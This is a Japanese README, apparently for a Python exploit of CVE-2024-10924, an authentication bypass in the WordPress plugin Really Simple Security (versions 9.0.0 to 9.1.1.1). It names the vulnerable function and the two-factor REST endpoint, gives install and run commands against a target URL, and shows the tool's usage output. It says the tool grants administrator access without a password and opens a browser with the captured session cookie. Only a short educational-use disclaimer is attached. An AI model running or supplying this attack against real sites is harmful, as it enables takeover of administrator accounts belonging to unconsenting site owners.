
Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - 認証バイパス
Really Simple Security(Free、Pro、Pro Multisite)9.0.0 - 9.1.1.1 - 認証バイパス
このスクリプトは、WordPress用のReally Simple Securityプラグイン(バージョン9.0.0~9.1.1.1)の脆弱性を悪用します。この欠陥は、二要素認証APIのcheck_login_and_get_user関数における不適切なエラーハンドリングにより、認証バイパスを許します。
このエクスプロイトを使用すると、攻撃者は2FAが有効になっている場合、任意のユーザー(例:管理者)としてログインできます。認証されると、スクリプトは取得したセッションCookieを使用してブラウザセッションを自動的に起動します。
スクリプトを実行する前に、必要な依存関係をインストールしてください:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://TARGET-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/ にリダイレクトし、パスワードを必要とせずに管理者アクセスを許可します。usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
このスクリプトは教育目的および認可されたセキュリティ評価のみを目的としています。このスクリプトの誤用は法的な結果を招く可能性があります。システムにテストを実施する前に、必ず適切な承認を得てください。